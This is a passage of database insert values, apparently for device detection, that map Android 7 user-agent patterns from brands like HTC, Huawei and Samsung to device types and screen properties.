7.*; GM 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GM6_Tur) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GO 55303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GO Onyx mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GO Onyx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GO1004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GO550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GOME 2017M27A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GOME 2017M95A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GRAVITY PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GS270 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GS270) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-I9192) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-I9195) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-I9305) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-I9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-I9505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-N7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT-P7500) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GT6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Gemini Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; General Mobile 4G Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; General Mobile 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Gigaset GS170) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Gometel-250-S95) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Grand 5.5 HD II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Grand M2 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Grand M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Grand XL LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Grand XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Grand) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Gravity) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Griffe T2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Griffe T3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H1711) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H1711z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H3311) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H3321) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H4311) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H4331) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; H50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HAFURY MIX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HAFURY UMAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HARRY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HIT Q401 3G HT4039PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HIT Q500 3G HT5035PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HK-K5016A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HM-G552-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HM-G701-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HM-N505-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HM-N700-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HORIZON) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HT26) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HT37Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HT50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HT70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC 10 evo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC 2Q4R100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC Desire 12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC Desire 550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC One A9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC One M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC U Ultra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC U11 life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC U11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC6535LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC6545LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTCD160LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC_A9u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC_M10f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC_M9u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HTC_U-3u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI CAN-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI CAN-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI CAN-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI CAN-L13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI CAZ-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI CAZ-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI MLA-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI MLA-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI MLA-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI MLA-L13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI NMO-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI NMO-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 